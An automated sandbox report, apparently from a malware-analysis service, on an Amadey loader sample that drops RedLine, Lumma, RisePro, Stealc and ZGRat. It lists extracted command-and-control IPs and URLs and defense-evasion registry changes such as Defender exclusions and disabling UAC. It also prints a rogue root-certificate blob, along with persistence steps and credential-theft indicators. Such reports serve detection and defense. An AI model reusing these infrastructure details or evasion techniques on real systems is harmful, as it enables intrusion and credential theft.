amadey | fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f

Analysis

max time kernel
50s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
07/05/2024, 02:52

Sharing

Copy URL Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe
Size

1.5MB
MD5

d1046f80374e3c0c257fe2380eeef4ff
SHA1

bf58835dd0c0a4eb7ca7e97508a860c7e57ec66a
SHA256

fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f
SHA512

a3095cf8e6bd9ced2075fa9e322c6471afea8eb69128633982ae15056ac77e7a2f4f4a96a300250c0bd63693fcf3ae793d20699c9c49ad22f38963ee07da98c7
SSDEEP

24576:HTTwE5AXygjUVegduoa4a4ZC1Kjf3c4c8E01CXmk4YDHvtguO6vTwX5sjbV3mCr:HolKAg2h4YLTO6EXSbVWCr

Score

10^/10

amadey lumma privateloader redline risepro stealc zgrat @cloudytteam test1234 evasion execution infostealer loader persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

stealc

http://52.143.157.84

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

lumma

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral1/memory/5244-479-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000a000000023bda-534.dat	family_zgrat_v1
behavioral1/memory/1020-693-0x00000000006E0000-0x00000000007A0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5560-985-0x0000023FA44D0000-0x0000023FA7D04000-memory.dmp	family_zgrat_v1
behavioral1/memory/5560-1022-0x0000023FC2600000-0x0000023FC270A000-memory.dmp	family_zgrat_v1
behavioral1/memory/5560-1026-0x0000023FC23E0000-0x0000023FC2404000-memory.dmp	family_zgrat_v1

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	9jwfgRbC93y6EDVIWJbqkK0O.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/files/0x000a000000023ba1-214.dat	family_redline
behavioral1/memory/4232-228-0x0000000000CB0000-0x0000000000D02000-memory.dmp	family_redline
behavioral1/files/0x000b000000023bd7-530.dat	family_redline
behavioral1/files/0x000a000000023bda-534.dat	family_redline
behavioral1/memory/5880-566-0x0000000000C60000-0x0000000000CB2000-memory.dmp	family_redline
behavioral1/memory/1020-693-0x00000000006E0000-0x00000000007A0000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	9jwfgRbC93y6EDVIWJbqkK0O.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cd0a04cbf6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9jwfgRbC93y6EDVIWJbqkK0O.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
176	5560	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1172	powershell.exe
4460	powershell.exe
6360	powershell.exe
6016	powershell.exe
6248	powershell.exe
7064	powershell.exe
3652	powershell.exe
5672	powershell.exe
6964	powershell.exe
5368	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9jwfgRbC93y6EDVIWJbqkK0O.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cd0a04cbf6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cd0a04cbf6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9jwfgRbC93y6EDVIWJbqkK0O.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	NewB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	explorta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	amert.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	file300un.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	regasm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	76c1f15004.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	explorha.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	3rc2RLbt0QnRe3wK5yVJOB5Q.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	install.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MpEJHqjbQpkdFKdQNdQRSdjx.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qGVdIZj1vLmQH3IR35LNmW5O.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UefNs3IvUkpDJJEqDhTFDtMg.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6CGAMR9ecUEfSwsS9pNDL09X.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RNEYiC0tWFBLCMlJUdPHE9U3.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5PO66uyR8U17njQsMnNTjH9b.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SF7ZpT0zsiMGnyuoI9pSG8LC.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vZrPV6AoDbKGhY8mNREph1jM.bat	regasm.exe

Executes dropped EXE 28 IoCs

pid	Process
4656	explorta.exe
4428	explorta.exe
3432	amert.exe
1688	cd0a04cbf6.exe
468	explorha.exe
4528	76c1f15004.exe
2968	swiiiii.exe
4232	jok.exe
552	swiiii.exe
5272	file300un.exe
5816	gold.exe
6076	3rc2RLbt0QnRe3wK5yVJOB5Q.exe
6120	oR5XYGuEOu0eN2kqrYnCF36U.exe
5124	58lh1kSDR5QgDdkR8Dg4gafR.exe
5196	Ixl4oRZ5ssjR15YA9xS7hYbf.exe
5284	6HCYl2ScCL5GeAh93IDkEpIs.exe
1612	alexxxxxxxx.exe
2112	u4os.0.exe
5504	9jwfgRbC93y6EDVIWJbqkK0O.exe
5880	keks.exe
1020	trf.exe
1896	install.exe
2504	NewB.exe
4924	u4os.1.exe
5676	YuxvMHd8veUMYWJ75HoYGoEE.exe
6096	explorha.exe
2632	explorta.exe
2800	Install.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Software\Wine	explorha.exe

Loads dropped DLL 3 IoCs

pid	Process
5732	rundll32.exe
5560	rundll32.exe
2496	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 39 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2112-0-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/2112-2-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/2112-3-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/2112-4-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/2112-7-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/2112-6-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/2112-5-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/2112-1-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/2112-8-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/files/0x004200000002351b-14.dat	themida
behavioral1/memory/4656-22-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/2112-21-0x0000000000900000-0x0000000000DE0000-memory.dmp	themida
behavioral1/memory/4656-23-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4656-24-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4656-27-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4656-29-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4656-28-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4656-25-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4656-30-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4656-26-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4428-37-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/4656-83-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/files/0x00110000000239f7-90.dat	themida
behavioral1/memory/1688-106-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/1688-113-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/1688-112-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/1688-123-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/1688-121-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/1688-120-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/1688-122-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/1688-111-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/1688-110-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/4656-209-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/files/0x000a000000023bdf-495.dat	themida
behavioral1/memory/5504-512-0x0000000140000000-0x0000000140862000-memory.dmp	themida
behavioral1/memory/2632-650-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/2632-679-0x0000000000AC0000-0x0000000000FA0000-memory.dmp	themida
behavioral1/memory/1688-712-0x00000000005D0000-0x0000000000BF9000-memory.dmp	themida
behavioral1/memory/5504-1081-0x0000000140000000-0x0000000140862000-memory.dmp	themida

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	9jwfgRbC93y6EDVIWJbqkK0O.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	file300un.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cd0a04cbf6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\cd0a04cbf6.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\76c1f15004.exe = "C:\\Users\\Admin\\1000021002\\76c1f15004.exe"	explorta.exe

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cd0a04cbf6.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9jwfgRbC93y6EDVIWJbqkK0O.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
104	pastebin.com
106	pastebin.com
220	bitbucket.org
221	bitbucket.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
190	api.myip.com
191	ipinfo.io
192	ipinfo.io
189	api.myip.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0010000000023a19-130.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	9jwfgRbC93y6EDVIWJbqkK0O.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	9jwfgRbC93y6EDVIWJbqkK0O.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	9jwfgRbC93y6EDVIWJbqkK0O.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	9jwfgRbC93y6EDVIWJbqkK0O.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
4428	explorta.exe
3432	amert.exe
468	explorha.exe
5504	9jwfgRbC93y6EDVIWJbqkK0O.exe
6096	explorha.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4656 set thread context of 4428	4656	explorta.exe	93
PID 2968 set thread context of 1212	2968	swiiiii.exe	112
PID 552 set thread context of 4556	552	swiiii.exe	121
PID 5272 set thread context of 5376	5272	file300un.exe	127
PID 5816 set thread context of 5896	5816	gold.exe	136
PID 1612 set thread context of 5244	1612	alexxxxxxxx.exe	150

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorta.job	fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f.exe
File created	C:\Windows\Tasks\explorha.job	amert.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5368	sc.exe
6228	sc.exe
228	sc.exe
3120	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
1684	2968	WerFault.exe	110
5444	1612	WerFault.exe	149
2328	6076	WerFault.exe	137
4432	2112	WerFault.exe	153

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5384	schtasks.exe
6864	schtasks.exe
6912	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133595239611676371"	chrome.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4428	explorta.exe
4428	explorta.exe
3432	amert.exe
3432	amert.exe
468	explorha.exe
468	explorha.exe
2584	chrome.exe
2584	chrome.exe
5368	powershell.exe
5368	powershell.exe
5368	powershell.exe
4232	jok.exe
4232	jok.exe
5560	rundll32.exe
5560	rundll32.exe
5560	rundll32.exe
5560	rundll32.exe
5560	rundll32.exe
5560	rundll32.exe
5560	rundll32.exe
5560	rundll32.exe
5560	rundll32.exe
5560	rundll32.exe
6016	powershell.exe
6016	powershell.exe
6016	powershell.exe
6096	explorha.exe
6096	explorha.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2584	chrome.exe
2584	chrome.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeDebugPrivilege	5272	file300un.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeDebugPrivilege	5376	regasm.exe
Token: SeDebugPrivilege	5368	powershell.exe
Token: SeShutdownPrivilege	2584	chrome.exe
Token: SeCreatePagefilePrivilege	2584	chrome.exe
Token: SeShutdownPrivilege	2584	chrome.exe
